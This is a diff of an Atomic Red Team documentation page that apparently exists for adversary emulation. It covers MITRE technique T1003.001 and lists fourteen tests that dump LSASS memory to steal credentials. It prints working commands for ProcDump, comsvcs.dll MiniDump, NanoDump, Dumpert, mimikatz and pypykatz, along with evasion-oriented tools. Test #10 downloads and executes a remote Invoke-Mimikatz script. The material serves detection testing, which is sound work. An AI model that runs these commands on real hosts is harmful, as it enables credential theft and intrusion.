+> Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
+> 
+> As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
+> 
+> For example, on the target host use procdump:
+> 
+> * <code>procdump -ma lsass.exe lsass_dump</code>
+> 
+> Locally, mimikatz can be run using:
+> 
+> * <code>sekurlsa::Minidump lsassdump.dmp</code>
+> * <code>sekurlsa::logonPasswords</code>
+> 
+> Built-in Windows tools such as `comsvcs.dll` can also be used:
+> 
+> * <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
+> 
+> Similar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)
+> 
+> Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
+> 
+> The following SSPs can be used to access credentials:
+> 
+> * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
+> * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
+> * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
+> * CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)

-For example, on the target host use procdump:
-
-* <code>procdump -ma lsass.exe lsass_dump</code>
-
-Locally, mimikatz can be run using:
-
-* <code>sekurlsa::Minidump lsassdump.dmp</code>
-* <code>sekurlsa::logonPasswords</code>
-
-Built-in Windows tools such as `comsvcs.dll` can also be used:
-
-* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
-
-Similar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)
-
-Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
-
-The following SSPs can be used to access credentials:
-
-* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
-* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
-* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
-* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
-
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1003/001)

 ## Atomic Tests

- [Atomic Test #1 - Dump LSASS.exe Memory using ProcDump](#atomic-test-1---dump-lsassexe-memory-using-procdump)
+- [Atomic Test #1: Dump LSASS.exe Memory using ProcDump](#atomic-test-1-dump-lsassexe-memory-using-procdump)
+- [Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2-dump-lsassexe-memory-using-comsvcsdll)
+- [Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3-dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
+- [Atomic Test #4: Dump LSASS.exe Memory using NanoDump](#atomic-test-4-dump-lsassexe-memory-using-nanodump)
+- [Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5-dump-lsassexe-memory-using-windows-task-manager)
+- [Atomic Test #6: Offline Credential Theft With Mimikatz](#atomic-test-6-offline-credential-theft-with-mimikatz)
+- [Atomic Test #7: LSASS read with pypykatz](#atomic-test-7-lsass-read-with-pypykatz)
+- [Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8-dump-lsassexe-memory-using-out-minidumpps1)
+- [Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9-create-mini-dump-of-lsassexe-using-procdump)
+- [Atomic Test #10: Powershell Mimikatz](#atomic-test-10-powershell-mimikatz)
+- [Atomic Test #11: Dump LSASS with createdump.exe from .Net v5](#atomic-test-11-dump-lsass-with-createdumpexe-from-net-v5)
+- [Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12-dump-lsassexe-using-imported-microsoft-dlls)
+- [Atomic Test #13: Dump LSASS.exe using lolbin rdrleakdiag.exe](#atomic-test-13-dump-lsassexe-using-lolbin-rdrleakdiagexe)
+- [Atomic Test #14: Dump LSASS.exe Memory through Silent Process Exit](#atomic-test-14-dump-lsassexe-memory-through-silent-process-exit)

- [Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2---dump-lsassexe-memory-using-comsvcsdll)
+### Atomic Test #1: Dump LSASS.exe Memory using ProcDump

- [Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
-
- [Atomic Test #4 - Dump LSASS.exe Memory using NanoDump](#atomic-test-4---dump-lsassexe-memory-using-nanodump)
-
- [Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager)
-
- [Atomic Test #6 - Offline Credential Theft With Mimikatz](#atomic-test-6---offline-credential-theft-with-mimikatz)
-
- [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz)
-
- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
-
- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
-
- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz)
-
- [Atomic Test #11 - Dump LSASS with createdump.exe from .Net v5](#atomic-test-11---dump-lsass-with-createdumpexe-from-net-v5)
-
- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
-
- [Atomic Test #13 - Dump LSASS.exe using lolbin rdrleakdiag.exe](#atomic-test-13---dump-lsassexe-using-lolbin-rdrleakdiagexe)
-
- [Atomic Test #14 - Dump LSASS.exe Memory through Silent Process Exit](#atomic-test-14---dump-lsassexe-memory-through-silent-process-exit)
-
-
-<br/>
-
-## Atomic Test #1 - Dump LSASS.exe Memory using ProcDump
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
 ProcDump.

@@ -76,41 +60,39 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex

 **Supported Platforms:** Windows

+**auto_generated_guid:** `0be2230c-9ab3-4ac2-8826-3199b9a0ebf8`

-**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
 | procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;procdump.exe|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 "#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del "#{output_file}" >nul 2> nul
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
@@ -120,47 +102,29 @@ New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
 Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
 ```

+### Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.

 Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `2536dee2-12fb-459a-8c37-971844fa73be`

-**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
 ```
+### Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. 
 https://github.com/outflanknl/Dumpert
 https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
@@ -170,53 +134,46 @@ If you see a message saying \"The system cannot find the path specified.\", try

 **Supported Platforms:** Windows

+**auto_generated_guid:** `7ae7102c-a099-45c8-b985-4c7a2d05790d`

-**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | dumpert_exe | Path of Dumpert executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;Outflank-Dumpert.exe|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 "#{dumpert_exe}"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del C:\windows\temp\dumpert.dmp >nul 2> nul
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{dumpert_exe}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 New-Item -ItemType Directory (Split-Path "#{dumpert_exe}") -Force | Out-Null
 Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "#{dumpert_exe}"
 ```

+### Atomic Test #4: Dump LSASS.exe Memory using NanoDump

-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Dump LSASS.exe Memory using NanoDump
 The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.

 https://github.com/helpsystems/nanodump
@@ -225,61 +182,48 @@ Upon successful execution, you should find the nanondump.dmp file in the temp di

 **Supported Platforms:** Windows

+**auto_generated_guid:** `dddd4aca-bbed-46f0-984d-e4c5971c51ea`

-**auto_generated_guid:** dddd4aca-bbed-46f0-984d-e4c5971c51ea
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del "%temp%\nanodump.dmp" >nul 2> nul
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
 ```

+### Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager

-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
 Manager and administrative permissions.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `dea6c349-f1c6-44f3-87a1-1ed33a59a607`

-**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
-
-
-
-
-
-#### Run it with these steps! 
+#### Attack Commands: Run it with these steps! 
 1. Open Task Manager:
  On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
  on the task bar and selecting "Task Manager".
@@ -292,51 +236,41 @@ Manager and administrative permissions.
  Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.


+### Atomic Test #6: Offline Credential Theft With Mimikatz

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Offline Credential Theft With Mimikatz
 The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
 Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `453acf13-1dbd-47d7-b28a-172ce9228023`

-**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path of the Lsass dump | path | %tmp%&#92;lsass.DMP|
 | mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;x64&#92;mimikatz.exe|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 "#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{mimikatz_exe}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
@@ -345,23 +279,23 @@ $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_dow
 $basePath = Split-Path "#{mimikatz_exe}" | Split-Path
 Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
 ```
+
 ##### Description: Lsass dump must exist at specified location (#{input_file})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 cmd /c "if not exist #{input_file} (exit /b 1)"
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
 ```

+### Atomic Test #7: LSASS read with pypykatz

-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - LSASS read with pypykatz
 Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::

 Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
@@ -372,71 +306,74 @@ Will create a Python virtual environment within the External Payloads folder tha

 **Supported Platforms:** Windows

+**auto_generated_guid:** `c37bc535-5c62-4195-9cc3-0517673171d8`

-**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_001|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 "#{venv_path}\Scripts\pypykatz" live lsa
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del "%temp%\nanodump.dmp" > nul 2> nul
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Computer must have python 3 installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
+
 ##### Description: Computer must have venv configured at #{venv_path}
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 py -m venv "#{venv_path}"
 ```
+
 ##### Description: pypykatz must be installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
 ```

+### Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1

-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
 The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
 powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
 Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
@@ -445,16 +382,9 @@ Author of Out-Minidump: Matthew Graeber (@mattifestation)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `6502c8f0-b775-4dbd-9193-1298f56b6781`

-**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -464,19 +394,13 @@ catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
 get-process lsass | Out-Minidump
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
 ```
+### Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
 ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe

@@ -486,41 +410,39 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex

 **Supported Platforms:** Windows

+**auto_generated_guid:** `7cede33f-0acd-44ef-9774-15511300b24b`

-**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
 | procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;procdump.exe|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 "#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del "#{output_file}" >nul 2> nul
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
@@ -529,13 +451,8 @@ New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
 Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
 ```

+### Atomic Test #10: Powershell Mimikatz

-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Powershell Mimikatz
 Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
 If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
 Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. 
@@ -543,83 +460,62 @@ Or, if you try to run the test without the required administrative privileges yo

 **Supported Platforms:** Windows

+**auto_generated_guid:** `66fb0bc1-3c3f-47e9-a298-550ecfefacbc`

-**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_script | URL to a remote Mimikatz script that dumps credentials | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
 ```

+### Atomic Test #11: Dump LSASS with createdump.exe from .Net v5

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - Dump LSASS with createdump.exe from .Net v5
 Use createdump executable from .NET to create an LSASS dump.

 [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `9d0072c8-7cca-45c4-bd14-f852cfa35cf0`

-**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 $exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
 & "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: .Net v5 must be installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 $exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
 if ($exePath -and (Test-Path $exePath)) {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent
 ```

+### Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs

-
-
-<br/>
-<br/>
-
-## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
 importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump 
 file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
@@ -628,53 +524,46 @@ Upon successful execution, you should see the following file created $env:TEMP\l

 **Supported Platforms:** Windows

+**auto_generated_guid:** `86fc3f40-237f-4701-b155-81c01c48d697`

-**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | xordump_exe | Path to xordump | path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
 | output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 #{xordump_exe} -out #{output_file} -x 0x41
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item #{output_file} -ErrorAction Ignore
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Computer must have xordump.exe
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
 ```

+### Atomic Test #13: Dump LSASS.exe using lolbin rdrleakdiag.exe

-
-
-<br/>
-<br/>
-
-## Atomic Test #13 - Dump LSASS.exe using lolbin rdrleakdiag.exe
 The memory of lsass.exe is often dumped for offline credential theft attacks. 
 This can be achieved with lolbin rdrleakdiag.exe. 

@@ -682,16 +571,9 @@ Upon successful execution, you should see the following files created, $env:TEMP

 **Supported Platforms:** Windows

+**auto_generated_guid:** `47a539d1-61b9-4364-bf49-a68bc2a95ef0`

-**auto_generated_guid:** 47a539d1-61b9-4364-bf49-a68bc2a95ef0
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
@@ -709,19 +591,13 @@ write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /ful
 Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
